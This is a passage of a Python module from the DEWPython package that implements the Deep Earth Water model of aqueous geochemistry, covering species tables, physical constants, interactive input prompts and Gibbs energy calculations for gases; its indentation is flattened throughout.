# DEWModel.py
#!/usr/bin/env python
# coding: utf-8
## Package Imports
# Equation imports
import numpy as np
from DEWPython import DEWEquations
# Pandas is used for the custom sheet reading
import pandas as pd
# sys, threading, subprocess, and os all correspond to uses within the supcrt functions
import sys
import threading
import subprocess
import os
# json is used to load the species dictionaries and property tables stored as text files in resources
import json
# plotting imports
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
from matplotlib.lines import Line2D
# the inline magic only applies when this module runs inside IPython/Jupyter; guarded so a plain import does not fail
try:
    get_ipython().run_line_magic('matplotlib', 'inline')
except NameError:
    pass
from collections import defaultdict
# path and pkg_resources are used to reference downloaded files in the package
import pkg_resources
import os.path as op
#### Defining Global Variables (Locations and Constants)
resource_package = 'DEWPython' # resource package definition (standard)
# default mineral dictionary
min_path = '/'.join(('resources', 'mineralDictionary.txt'))
mineralPath = pkg_resources.resource_filename(resource_package, min_path)
# extended mineral dictionary
min_path2 = '/'.join(('resources', 'extendMineralDictionary.txt'))
mineralPath2 = pkg_resources.resource_filename(resource_package, min_path2)
# path for the gases used
gas_path = '/'.join(('resources', 'gasLst.txt'))
gasPath = pkg_resources.resource_filename(resource_package, gas_path)
#path for the aqueous species used
aq_path = '/'.join(('resources', 'aqueousLst.txt'))
aqPath = pkg_resources.resource_filename(resource_package, aq_path)
#paths for custom sheets
die_path = '/'.join(('resources', 'dielectric.csv'))
diePath = pkg_resources.resource_filename(resource_package, die_path)
inp_path ='/'.join(('resources', 'input.csv'))
inpPath = pkg_resources.resource_filename(resource_package, inp_path)
den_path ='/'.join(('resources', 'Wat_den.csv'))
denPath = pkg_resources.resource_filename(resource_package, den_path)
g_path = '/'.join(('resources', 'water_gibbs.csv'))
gPath = pkg_resources.resource_filename(resource_package, g_path)
# paths for supcrt
sup_path = '/'.join(('resources', 'supcrt96.exe'))
supPath = pkg_resources.resource_filename(resource_package, sup_path)
global T_r, bigQ, Chi, Pr, E_PrTr, bigR, Psy, Theta, Upsilon, Conversion, mineralDictionary
mineralDictionary = json.load(open(mineralPath))
try:
mineralDictionary2 = json.load(open(mineralPath2)) # the extended mineral dictionary is too large to be stored in github
'''A dictionary that stores all the minerals and allows them to be queried for use in the DEW model.'''
except:
print('Extended Mineral Dictionary not in use')
# Defining global constants analogous to DEW 2019
bigQ = 5.903E-07
'''Big Q is 5.903E-07 and has units of bar^-1'''
Chi = -3.090E-07
'''X is the constant -3.090E-07 and has units of K^-2'''
T_r = 298.15
'''The standard state temperature 298.15 with units K'''
Pr = 1
'''The standard state pressure of 1 bar'''
E_PrTr = 78.47
'''Epsilon_{P_rT_r} is a unitless constant with value of 78.47'''
bigR = 1.9858775
'''The gas constant with value 1.9858775 cal mol^-1 k^-1'''
Psy = 2600
'''The value of this constant is 2600 bar'''
Theta = 228
'''The value of this temperature is 228 Kelvin'''
Upsilon = -5.79865E-05
'''The value of this constant is -5.79865E-05 K^-1'''
Conversion = 41.8393
'''The conversion factor between cal and cm^3*bar (~41.84) used in DEW publications'''
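############ ILLUSTRATIVE EXAMPLE: USING THE CONSTANTS ABOVE ##################################
# A minimal sketch (values are hypothetical, not taken from the DEW sheet) of how the gas constant
# bigR enters the logK conversion used later in calculate(): logK = -delG / (2.302585 * bigR * T).
# delG_example = -5000.0                                              # cal/mol, hypothetical
# logK_example = -delG_example / (2.302585 * bigR * (25 + 273.15))    # ~= 3.67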
# ## Importing the Aqueous Species Table from the Sheet
[nameLst, symbolDict, delGf, delHf, entropy, volume, specHeat, a1x10,
a2x10_2, a3, a4x10_4, c1, c2x10_4, omegax10_5, Z, comments] = json.load(open(aqPath))
############ CODE SAMPLE FOR ADDING ADDITIONAL SPECIES (AQ) ##################################
# nameLst.append('ALANINE,AQ')
# symbolDict['ALANINE,AQ'] = 'C3H7NO2'
# delGf['ALANINE,AQ'] = -88810
# delHf['ALANINE,AQ'] = -132500
# entropy['ALANINE,AQ'] = 38.83
# volume['ALANINE,AQ'] = 60.4
# specHeat['ALANINE,AQ'] = 33.6
# a1x10['ALANINE,AQ'] = 14.9
# a2x10_2['ALANINE,AQ'] = 1.74
# a3['ALANINE,AQ'] = 7.16
# a4x10_4['ALANINE,AQ'] = -3.69
# c1['ALANINE,AQ'] = 49.5
# c2x10_4['ALANINE,AQ'] = -7
# omegax10_5['ALANINE,AQ'] = 0.18
# Z['ALANINE,AQ'] = 0
### CODE FOR REWRITING BASE FILES ###
# d =[nameLst, symbolDict, delGf, delHf, entropy, volume, specHeat, a1x10,
# a2x10_2, a3, a4x10_4, c1, c2x10_4, omegax10_5, Z, comments]
# json.dump(d, open("aqueousLst.txt",'w'))
####################### CODE SAMPLE FOR AUTOMATICALLY UPDATING SPECIES (GAS) #############################
# This can be easily adapted for aqueous species too
# with open('slopGasses.txt') as f:
# impor = f.read()
# import_data = impor.replace('\t', ' ')
# split = import_data.split('\n')
# newsplit = []
# for i in split:
# line = i.split(' ')
# newline = [j for j in line if j]
# newsplit.append(newline)
# for i in range(len(newsplit)):
# if ',g' in newsplit[i][0] :
# GasLst.append(newsplit[i][0])
# GasSymb[newsplit[i][0]] = newsplit[i][1]
# GasDelGf[newsplit[i][0]] =float(newsplit[i+3][0])
# GasDelHf[newsplit[i][0]] =float(newsplit[i+3][1])
# GasEntropy[newsplit[i][0]] =float(newsplit[i+3][2])
# GasCp[newsplit[i][0]] =float(newsplit[i+3][3])
# GasA[newsplit[i][0]] =float(newsplit[i+4][0])
# GasBx103[newsplit[i][0]] =float(newsplit[i+4][1])
# GasCx10_5[newsplit[i][0]] =float(newsplit[i+4][2])
# GasT[newsplit[i][0]] =float(newsplit[i+5][0])
# g =[GasLst,GasSymb,GasDelGf,GasDelHf,GasEntropy,GasCp,GasA,GasBx103,GasCx10_5, GasT]
# json.dump(g, open("gasLstNew.txt",'w'))
# ## Importing the Gas Table from the Sheet
[GasLst,GasSymb,GasDelGf,GasDelHf,GasEntropy,GasCp,GasA,GasBx103,GasCx10_5, GasT] = json.load(open(gasPath))
# Search function - can take any length of string
def search(string):
'''A function to search for species within DEWPython.'''
for item in nameLst:
if str.lower(string) in str.lower(item):
print(item)
for item in GasLst:
if str.lower(string) in str.lower(item):
print(item)
for key in mineralDictionary:
if str.lower(string) in str.lower(key):
print(key)
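# Example usage (illustrative; 'CO2' is just a sample query string, matches depend on the bundled lists):
# search('CO2')   # prints every aqueous, gas, and mineral entry whose name contains 'CO2'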
# # An Object Class that Can Calculate and Return Parameters for Different Options of the Deep Earth Water Model
class DEW(object):
def __init__(self):
# User Option Parameters
self.ptInput = 'Psat'
'''The temperature and pressure input; options are Regular, Psat, or Custom. Default is Psat.'''
self.RhoOfWater = 'Z&D 2005'
'''The density of water equation input; options are Z&D 2005 (Zhang and Duan 2005), Z&D 2009 (Zhang and Duan 2009), or Custom. Default is Z&D 2005.'''
self.forceCustom = False
'''The option to force custom Rho for P< 1 kb. Default is False'''
self.dielectricEq = 'Supcrt'
'''The dielectric constant equation input; options are Supcrt, Franck, Fernandez, Sverjensky, or Custom. Default is Supcrt.'''
self.ForceSupcrt = True
'''The option to force supcrt for P < 5 kb. Default is set to true'''
self.WaterFreeEq = 'D&H 1978'
'''The option for the water free energy equation. Options are D&H 1978, Integral, and Custom.
Default is D&H 1978 (Delany and Helgeson 1978).'''
self.DisplayVolOpt = True
'''The option to display volume, default set to true'''
self.PsatDisplayVol = True
'''The option to display volume under Psat conditions. Default is set to true.'''
self.DisplayVol = True
'''Another display volume option. Default to true.'''
self.equation = 1
'''A variable that stores the number of the density of water equation. Needs to be renamed'''
self.diaEq = 1
'''A variable that stores the number of dielectric constant equation.'''
self.psat = True
'''A variable that stores the Psat option defined by input'''
self.waterDensity = 1
'''A variable that stores the number of the density of water equation.'''
# Input Arrays
self.aqueousInputs = []
'''The array of aqueous inputs and multipliers defined by a user'''
self.mineralInputs = []
'''The array of mineral inputs and multipliers defined by a user'''
self.gasInputs = []
'''The array of gas inputs and multipliers defined by a user'''
self.waterInputs = []
'''An array that records whether water is used as an input and, if so, its multiplier'''
# Input Matrices
self.inGasMat = []
'''A matrix that stores the gaseous inputs with their properties from the dictionary entries'''
self.inAqMat = []
'''A matrix that stores the aqueous inputs with their properties from the dictionary entries'''
# Output Arrays
self.aqueousOutputs = []
'''The array of aqueous outputs and multipliers defined by a user'''
self.mineralOutputs = []
'''The array of mineral outputs and multipliers defined by a user'''
self.gasOutputs = []
'''The array of gas outputs and multipliers defined by a user'''
self.waterOutputs = []
'''An array that records whether water is used as an output and, if so, its multiplier'''
# Output Matrices
self.outGasMat = []
'''A matrix that stores the gaseous outputs with their properties from the dictionary entries'''
self.outAqMat = []
'''A matrix that stores the aqueous outputs with their properties from the dictionary entries'''
# Arrays used for Calculations
self.tempUsed = []
'''An array set by the set_TPRho method that contains all the temperatures used for calculation in celsius'''
self.pressureUsed = []
'''An array set by the set_TPRho method that contains all the pressures used for calculation'''
self.tKelvin = []
'''An array set by the set_TPRho method that contains all the temperatures used for calculation in Kelvin'''
self.RhoWatArr = []
'''An array set by the set_TPRho method that contains calculated water densities at the temperatures and pressures used
'''
self.DiaArr = []
'''An array set by the set_TPRho method that contains calculated dielectric constants at temp/pressure used'''
self.QArr = []
'''An array set by the set_TPRho method that contains calculated Q constants at temp/pressure used'''
self.GibbsH2O = []
'''A collection of the gibbs of water values.'''
# Collections of Custom Values
self.dielectricCollection = []
'''If custom values are used for the dielectric constant this will store them to be queried by the custom function'''
self.gibbsCollection = []
'''If custom values are used for the gibbs of water this will store them to be queried by the custom function'''
self.densityCollection = []
'''If custom values are used for the density of water this will store them to be queried by the custom function'''
# Calculated Matrices
self.gasInpGibbs = []
'''Used for debugging, stores the free energy changes of gases'''
self.aqInpGibbs = []
'''Used for debugging, stores the free energy changes of aqueous inputs'''
self.gasInpV = []
'''Used for debugging, stores the volume changes of gaseous inputs'''
self.aqInpV = []
'''Used for debugging, stores the volume changes of aqueous inputs'''
self.gasOutGibbs = []
'''Used for debugging, stores the free energy changes of gaseous outputs'''
self.aqOutGibbs = []
'''Used for debugging, stores the free energy changes of aqueous outputs'''
self.gasOutV = []
'''Used for debugging, stores the volume changes of gaseous outputs'''
self.aqOutV = []
'''Used for debugging, stores the volume changes of aqueous outputs'''
#Mineral Matrices
self.mineralInpGibbs = []
'''Used for debugging, stores the free energy changes of mineral inputs'''
self.mineralOutGibbs = []
'''Used for debugging, stores the free energy changes of mineral outputs'''
self.mineralInpV = []
'''Used for debugging, stores the volume changes of mineral inputs'''
self.mineralOutV = []
'''Used for debugging, stores the volume changes of mineral outputs'''
#Water
self.waterInpGibbs = []
'''Used for debugging, stores the free energy changes of water inputs'''
self.waterInpV = []
'''Used for debugging, stores the volume changes of water inputs'''
self.waterOutGibbs = []
'''Used for debugging, stores the free energy changes of water outputs'''
self.waterOutV = []
'''Used for debugging, stores the volume changes of water outputs'''
# Finals Arrays
self.gibbsLst = []
'''A storage variable that lists the gibbs free energy changes. Not sure if necessary'''
self.logK = []
'''Stores the list of all logK values with temperatures and pressures'''
self.vLst = []
'''A storage variable that lists all the volume changes. Not sure if necessary '''
self.delG = []
'''Stores the list of all delG values with temperatures and pressures'''
self.delV = []
'''Stores the list of all delV values with temperatures and pressures'''
# Variables to Help with Plotting
self.pressRed = []
'''Reduced pressure list with no repeats'''
self.tempRed = []
'''Reduced temperature list with no repeats'''
self.pLogK = []
'''LogK split into arrays with respect to the number of isobars'''
self.pDelG = []
'''DelG split into arrays with respect to the number of isobars'''
self.pDelV = []
'''DelV split into arrays with respect to the number of isobars'''
self.tLogK = []
'''LogK split into arrays with respect to the number of isotherms'''
self.tDelG = []
'''DelG split into arrays with respect to the number of isotherms'''
self.tDelV = []
'''DelV split into arrays with respect to the number of isotherms'''
# Variables to run SUPCRTBL
self.proc = None
'''Needed to run supcrt'''
self.pout = None
'''Needed to run supcrt'''
self.pin = None
'''Needed to run supcrt'''
self.supcrtFile = None
'''Stores the most recently run SUPCRT file, or none if none have been run'''
self.supcrtOut = None
'''Stores the output from calculate_supcrt'''
def clear(self):
'''Clears variables'''
self.__init__()
return
def set_inputs(self):
'''Call this to set the input Arrays. This is not dependent on anything else being called first.'''
# Accepted multiplier values (integers 1-11, entered as strings)
intLst = ['1','2','3','4', '5', '6','7', '8', '9', '10', '11']
# Mineral Loop
mineralCount = 0
aqCount = 0
gasCount = 0
self.mineralInputs = []
self.aqueousInputs = []
self.gasInputs = []
self.waterInputs = []
while mineralCount < 15:
mineralCount += 1
validBool = False
while not validBool:
inp = input('Input Mineral Species')
# can insert mineral validation here if possible
if inp in mineralDictionary:
validBool = True
elif inp == "":
validBool = True
else:
print('Your Species is not in the list, please check your spelling')
continue
validBool2 = False
while not validBool2:
inp2 = input('Input Mineral Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.mineralInputs.append([inp, inp2])
while aqCount <15:
aqCount += 1
validBool = False
while not validBool:
inp = input('Input Aqueous Species')
if inp in nameLst:
validBool = True
elif inp == "":
validBool = True
else:
print('Your Species is not in the list, please check your spelling')
continue
validBool2 = False
if validBool:
while not validBool2:
inp2 = input('Input Aqueous Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.aqueousInputs.append([inp, inp2])
while gasCount < 15:
gasCount += 1
validBool = False
while not validBool:
inp = input('Input Gas Species')
if inp in GasLst:
validBool = True
elif inp == "":
validBool = True
else:
print('Your Species is not in the list, please check your spelling')
continue
if validBool:
validBool2 = False
while not validBool2:
inp2 = input('Input Gas Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.gasInputs.append([inp, inp2])
# Water
validBool3 = False
while not validBool3:
inpWater = input('Would you like to use water? (yes/no)')
if inpWater in ['yes', 'no']:
validBool3 = True
else:
print('Please answer yes or no')
continue
if inpWater == 'yes':
validBool3 = False
while not validBool3:
m3 = input('Enter the water multiplier')
if m3 in intLst:
validBool3 = True
else:
print('Please enter a valid integer multiplier ')
else:
m3 = 0
self.waterInputs.append([inpWater, m3])
return
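# Example of the resulting input arrays (values illustrative only): each entry is a [name, multiplier] pair, e.g.
# self.aqueousInputs -> [['CO2,AQ', '1']]
# self.waterInputs   -> [['yes', '1']] if water is used, otherwise [['no', 0]]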
def set_outputs(self):
'''Call this to set the output Arrays. This is not dependent on anything else being called first.'''
# Accepted multiplier values (integers 1-11, entered as strings)
intLst = ['1','2','3','4', '5', '6','7', '8', '9', '10', '11']
# Mineral Loop
mineralCount = 0
aqCount = 0
gasCount = 0
self.mineralOutputs = []
self.aqueousOutputs = []
self.gasOutputs = []
self.waterOutputs = []
while mineralCount < 15:
mineralCount += 1
validBool = False
while not validBool:
inp = input('Output Mineral Species')
# can insert mineral validation here if possible
validBool = True
validBool2 = False
while not validBool2:
inp2 = input('Output Mineral Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.mineralOutputs.append([inp, inp2])
while aqCount <15:
aqCount += 1
validBool = False
while not validBool:
inp = input('Output Aqueous Species')
if inp in nameLst:
validBool = True
elif inp == "":
validBool = True
else:
print('Your Species is not in the list, please check your spelling')
continue
validBool2 = False
if validBool:
while not validBool2:
inp2 = input('Output Aqueous Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.aqueousOutputs.append([inp, inp2])
while gasCount < 15:
gasCount += 1
validBool = False
while not validBool:
inp = input('Output Gas Species')
if inp in GasLst:
validBool = True
elif inp == "":
validBool = True
else:
print('Your Species is not in the list, please check your spelling')
continue
validBool2 = False
if validBool:
while not validBool2:
inp2 = input('Output Gas Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.gasOutputs.append([inp, inp2])
# Water
validBool3 = False
while not validBool3:
outWater = input('Would you like to use water in the output? (yes/no)')
if outWater in ['yes', 'no']:
validBool3 = True
else:
print('Please answer yes or no')
if outWater == 'yes':
validBool3 = False
while not validBool3:
m3 = input('Enter the water multiplier')
if m3 in intLst:
validBool3 = True
else:
print('Please enter a valid integer multiplier ')
else:
m3 = 0
self.waterOutputs.append([outWater, m3])
return
def set_preferences(self):
'''A function that prompts for user inputs. This is not dependent on anything else being called first. Defaults
are set to be identical to the example calculation on the Deep Earth Water Model Excel Sheet.'''
validBool = False
while not validBool:
ptInp = input('Which P-T input would you like to use? "Custom", "Regular", or "Psat"')
if ptInp in ['Custom', 'Regular', 'Psat']:
validBool = True
self.ptInput = ptInp
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
RhoOfwater = input('Which density of water would you like to use? "Z&D 2005", "Z&D 2009", or "Custom"')
if RhoOfwater in ['Z&D 2005', 'Z&D 2009', 'Custom']:
validBool = True
self.RhoOfWater = RhoOfwater
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
force = input('Force Custom? (yes/no)')
if force == 'yes':
validBool = True
self.forceCustom = True
elif force == 'no':
validBool = True
self.forceCustom = False
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
dia = input('Dielectric Constant Equation Option: "Supcrt", "Franck", "Fernandez", "Sverjensky", or "Custom"')
if dia in ['Supcrt', 'Franck', 'Fernandez', 'Sverjensky','Custom']:
validBool = True
self.dielectricEq = dia
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
forceS = input('Force Supcrt? (yes/no)')
if forceS == 'yes':
validBool = True
elif forceS == 'no':
validBool = True
self.ForceSupcrt = False
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
freeE = input('Water Free Energy Equation Option: "D&H 1978", "Integral", "Custom"')
if freeE in ['D&H 1978', 'Integral', 'Custom']:
validBool = True
self.WaterFreeEq = freeE
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
dispO = input('Display Volume Option? (yes/no)')
if dispO == 'yes':
validBool = True
elif dispO == 'no':
validBool = True
self.DisplayVolOpt = False
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
PsatdispO = input('Psat Display Volume Option? (yes/no)')
if PsatdispO == 'yes':
validBool = True
elif PsatdispO == 'no':
validBool = True
self.PsatDisplayVol = False
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
dispV = input('Display Volume? (yes/no)')
if dispV == 'yes':
validBool = True
elif dispV == 'no':
validBool = True
self.DisplayVol = False
else:
print('Please enter one of the provided options')
if self.WaterFreeEq == "Custom" or self.dielectricEq == "Custom" or self.RhoOfWater == "Custom":
self.dielectricCollection, self.densityCollection, self.gibbsCollection = self.import_custom_sheets()
return
def import_custom_sheets(self):
'''A helper function to import custom data from the Deep Earth Water Model.
This only currently works for an unmodified Deep Earth Water Model Sheet format (6_23_20).
This is not dependent on anything else being called first.'''
diaL = pd.read_csv(diePath, header = None)
dia = diaL.to_numpy()
dia = dia[4:, 1:]
diaTrim = dia[1:, 1:]
diaCollection = []
for row in range(len(diaTrim)):
for pressure in range(len(diaTrim[0])):
# in form pressure, temperature, value
diaCollection.append([dia[0][pressure + 1], dia[row + 1][0], diaTrim[row][pressure]])
watDen = pd.read_csv(denPath, header = None)
w = watDen.to_numpy()
w = w[4:, 1:]
wTrim = w[1:,1:]
watDenCollection = []
for row in range(len(wTrim)):
for pressure in range(len(wTrim[0])):
# in form pressure, temperature, value
watDenCollection.append([w[0][pressure + 1], w[row + 1][0], wTrim[row][pressure]])
gibbsOfWater = pd.read_csv(gPath, header = None)
gibbs = gibbsOfWater.to_numpy()
gibbs = gibbs[3:,:]
gibbsTrim = gibbs[1:, 1:]
gibbsCollection = []
for row in range(len(gibbsTrim)):
for pressure in range(len(gibbsTrim[0])):
# in form pressure, temperature, value
gibbsCollection.append([gibbs[0][pressure + 1], gibbs[row + 1][0], gibbsTrim[row][pressure]])
return diaCollection, watDenCollection, gibbsCollection
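# Example of the returned structure (a sketch, assuming the bundled sheet layout): each collection is a
# list of [pressure, temperature, value] triples, one per grid point, e.g.
# model = DEW(); dia, den, gibbs = model.import_custom_sheets()
# dia[0] -> [pressure, temperature, dielectric constant] for the first point in the dielectric sheet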
def set_TPRho(self):
'''Sets arrays of temperature, pressure, water density, and Q to be used in the model based on user input.
Requires that the input and output arrays have been set up otherwise it will return a divide by 0 error in the
calculations.'''
pressArr = []
tempArr = []
self.RhoWatArr = []
self.DiaArr = []
self.QArr =[]
self.gibbsLst = []
self.logK = []
self.vLst = []
self.delG = []
self.delV = []
if self.ptInput == "Custom":
ptSheet = pd.read_csv(inpPath,encoding= 'unicode_escape', header = None)
ptFinder = ptSheet.to_numpy()
tempArr = [float(i[1]) for i in ptFinder[4:]]
pressArr = [float(i[0]) for i in ptFinder[4:]]
elif self.ptInput == "Regular":
validBool = False
while not validBool:
try:
templow = int(input('Input the minimum temperature'))
temphigh = int(input('Input the maximum temperature'))
tempstep = int(input('Input the temperature step'))
pmin = float(input('Input the minimum pressure (Kb)'))
pmax = float(input('Input the maximum pressure (Kb)'))
pstep = float(input('Input the pressure step (Kb)'))
validBool = True
except ValueError:
print('You have entered a non-integer value, please start again')
tempArr = np.arange(start= templow, stop = temphigh + .00001, step = tempstep)
parrHelp = np.arange(start= pmin, stop = pmax + .00001, step = pstep)
for i in range(len(parrHelp)):
pressArr.append([parrHelp[i]]* len(tempArr))
pressArr = np.multiply(pressArr, 1000)
tempArr = [tempArr] * len(parrHelp)
elif self.ptInput == "Psat":
validBool = False
while not validBool:
try:
templow = int(input('Input the minimum temperature'))
temphigh = int(input('Input the maximum temperature'))
tempstep = int(input('Input the temperature step'))
validBool = True
except ValueError:
print('You have entered a non-integer value, please start again')
tempArr = np.arange(start= templow, stop = temphigh + 1, step = tempstep)
for i in range(len(tempArr)):
if tempArr[i] < 100:
pressArr.append(1)
else:
pressArr.append(2.1650906415E-11*np.double(tempArr[i])**5 + 0.0008467019353*np.double(tempArr[i])**2 - 0.17973651666*tempArr[i] + 10.7768850763807)
else:
# If I've done the checking correctly above it should never reach this
raise ValueError("You have not set your options yet, please set them before continuing")
self.tempUsed = np.ndarray.flatten(np.asarray(tempArr))
self.pressureUsed = np.ndarray.flatten(np.asarray(pressArr))
self.tKelvin = np.add(self.tempUsed, 273.15)
# code to set options in a way the equations can understand
if self.ptInput == "Psat":
self.psat = True
else:
self.psat = False
if self.RhoOfWater =='Z&D 2005':
self.equation = 1
elif self.RhoOfWater == 'Z&D 2009':
self.equation = 2
else:
self.equation = 3
if self.dielectricEq == "Supcrt":
self.diaEq = 1
elif self.dielectricEq == "Franck":
self.diaEq = 2
elif self.dielectricEq == "Fernandez":
self.diaEq = 3
elif self.dielectricEq == "Sverjensky":
self.diaEq = 4
else:
self.diaEq = 5
# write code to take in custom Rho, G, and Water Values here
self.densityCollection = np.asarray(self.densityCollection).astype(float)
self.dielectricCollection = np.asarray(self.dielectricCollection).astype(float)
self.gibbsCollection = np.asarray(self.gibbsCollection).astype(float)
# Sets the water density array
for i in range(len(self.pressureUsed)):
# For the custom array
if self.RhoOfWater =="Custom" or (self.forceCustom == True and self.pressureUsed[i] < 1000):
idx = np.intersect1d(np.where(np.asarray(self.densityCollection) == self.pressureUsed[i]/1000), np.where(np.asarray(self.densityCollection) == self.tempUsed[i]))[0]
if not np.isnan(self.densityCollection[idx][2]):
self.RhoWatArr.append(self.densityCollection[idx][2])
else:
self.RhoWatArr.append(0)
else:
self.RhoWatArr.append(DEWEquations.DEWEquations.calculateDensity(self.pressureUsed[i], self.tempUsed[i], self.equation, 0.01, self.psat))
# Sets the dielectric constant array
for i in range(len(self.pressureUsed)):
# for the custom array
if self.dielectricEq == "Custom":
idx = np.intersect1d(np.where(np.asarray(self.dielectricCollection) == self.pressureUsed[i]/1000), np.where(np.asarray(self.dielectricCollection) == self.tempUsed[i]))[0]
if not np.isnan(self.dielectricCollection[idx][2]):
self.DiaArr.append(self.dielectricCollection[idx][2])
else:
self.DiaArr.append(0)
else:
if self.ForceSupcrt == True and self.pressureUsed[i] < 5000 and self.psat == False:
self.DiaArr.append(DEWEquations.DEWEquations.calculateEpsilon(self.RhoWatArr[i], self.tempUsed[i], 1, self.psat))
else:
self.DiaArr.append(DEWEquations.DEWEquations.calculateEpsilon(self.RhoWatArr[i], self.tempUsed[i], self.diaEq, self.psat))
### The function works up until this point, I haven't debugged further yet (6_29_20) ###
# Sets up the Q array
for i in range(len(self.pressureUsed)):
if self.DisplayVol == True:
try:
# Has issues with some Q, not sure if problematic
self.QArr.append(float(DEWEquations.DEWEquations.calculateQ(self.pressureUsed[i], self.tempUsed[i], self.RhoWatArr[i], self.equation, self.diaEq, self.psat))*np.double(10)**6)
except:
self.QArr.append(0)
else:
self.QArr.append(0)
# Sets up custom Gibbs of Water Array:
if self.WaterFreeEq == "Custom":
for i in range(len(self.pressureUsed)):
idx = np.intersect1d(np.where(np.asarray(self.gibbsCollection) == self.pressureUsed[i]/1000), np.where(np.asarray(self.gibbsCollection) == self.tempUsed[i]))[0]
if not np.isnan(self.gibbsCollection[idx][2]):
self.GibbsH2O.append(self.gibbsCollection[idx][2])
else:
self.GibbsH2O.append(0)
return
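# After set_TPRho() the model holds flattened, index-aligned arrays (a summary of the docstrings above, not new behaviour):
# self.tempUsed[i] / self.pressureUsed[i] -> temperature (deg C) and pressure (bar) of grid point i
# self.RhoWatArr[i], self.DiaArr[i], self.QArr[i] -> water density, dielectric constant, and Q at that point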
def calculate_matrices(self):
'''A helper function to aggregate the values to the input and output matrices.
It requires both the input and output arrays to be set up to function. It is called within "calculate"'''
self.inAqMat = []
self.inGasMat = []
self.outAqMat = []
self.outGasMat = []
for i in self.aqueousInputs:
self.inAqMat.append([i[0],symbolDict[i[0]], delGf[i[0]], delHf[i[0]], entropy[i[0]],volume[i[0]],specHeat[i[0]],
a1x10[i[0]], a2x10_2[i[0]], a3[i[0]],a4x10_4[i[0]],c1[i[0]],c2x10_4[i[0]],omegax10_5[i[0]],Z[i[0]], i[1]])
for i in self.gasInputs:
self.inGasMat.append([i[0],GasSymb[i[0]],GasDelGf[i[0]],GasDelHf[i[0]],GasEntropy[i[0]],GasCp[i[0]], GasA[i[0]],
GasBx103[i[0]],GasCx10_5[i[0]],GasT[i[0]], i[1]])
for i in self.aqueousOutputs:
self.outAqMat.append([i[0],symbolDict[i[0]], delGf[i[0]], delHf[i[0]], entropy[i[0]],volume[i[0]],specHeat[i[0]],
a1x10[i[0]], a2x10_2[i[0]], a3[i[0]],a4x10_4[i[0]],c1[i[0]],c2x10_4[i[0]],omegax10_5[i[0]],Z[i[0]], i[1]])
for i in self.gasOutputs:
self.outGasMat.append([i[0],GasSymb[i[0]],GasDelGf[i[0]],GasDelHf[i[0]],GasEntropy[i[0]],GasCp[i[0]], GasA[i[0]],
GasBx103[i[0]],GasCx10_5[i[0]],GasT[i[0]],i[1]])
return
def calculate_gas(self):
'''A helper function to calculate the gaseous columns and output them as a matrix. Specifically returns the arrays
gasInGibbs, gasOuGibbs, gasInV, gasOuV. Needs self.tempUsed and self.tKelvin to be set, as well as the input and output gas matrices.
It is called within the calculate function.'''
gasInGibbs = []
gasOuGibbs = []
gasInV = []
gasOuV = []
for gas in self.inGasMat:
storelst = []
storelst2 =[]
storelst.append(gas[0])
storelst.append(gas[10])
storelst2.append(gas[0])
storelst2.append(gas[10])
for i in range(len(self.tempUsed)):
if self.DisplayVol == False or self.tempUsed[i] == 0:
storelst2.append(0)
else:
storelst2.append(24.465)
for i in range(len(self.tKelvin)):
storelst.append(gas[2] - gas[4]*(self.tKelvin[i]-T_r) + gas[6]*(self.tKelvin[i]-T_r - self.tKelvin[i]*np.log(self.tKelvin[i]/T_r)) + gas[7]*(0.001)/2*(2*self.tKelvin[i]*T_r -np.double(self.tKelvin[i])**2 - np.double(T_r) **2) + gas[8]*100000*(np.double(self.tKelvin[i])**2 + np.double(T_r)**2 -2*self.tKelvin[i]*T_r)/(2*self.tKelvin[i]*np.double(T_r)**2))
gasInGibbs.append(storelst)
gasInV.append(storelst2)
for gas in self.outGasMat:
storelst = []
storelst2 = []
storelst.append(gas[0])
storelst.append(gas[10])
storelst2.append(gas[0])
storelst2.append(gas[10])
for i in range(len(self.tempUsed)):
if self.DisplayVol == False or self.tempUsed[i] == 0:
storelst2.append(0)
else:
storelst2.append(24.465)
for i in range(len(self.tKelvin)):
storelst.append(gas[2] - gas[4]*(self.tKelvin[i]-T_r) + gas[6]*(self.tKelvin[i]-T_r - self.tKelvin[i]*np.log(self.tKelvin[i]/T_r)) + gas[7]*(0.001)/2*(2*self.tKelvin[i]*T_r -np.double(self.tKelvin[i])**2 - np.double(T_r) **2) + gas[8]*100000*(np.double(self.tKelvin[i])**2 + np.double(T_r)**2 -2*self.tKelvin[i]*T_r)/(2*self.tKelvin[i]*np.double(T_r)**2))
gasOuGibbs.append(storelst)
gasOuV.append(storelst2)
if len(gasInGibbs) == 0:
gasInGibbs = [np.zeros(len(self.tKelvin) + 2)]
if len(gasOuGibbs) == 0:
gasOuGibbs = [np.zeros(len(self.tKelvin) + 2)]
if len(gasInV) == 0:
gasInV = [np.zeros(len(self.tKelvin) + 2)]
if len(gasOuV) == 0:
gasOuV = [np.zeros(len(self.tKelvin) + 2)]
return gasInGibbs, gasOuGibbs, gasInV, gasOuV
def calculate_H2O(self):
'''This function requires input and output matrices to be set. This is called within the calculate function.'''
waterMatInGibbs = []
waterMatOutGibbs = []
waterMatInV = []
waterMatOutV = []
if self.WaterFreeEq == 'D&H 1978':
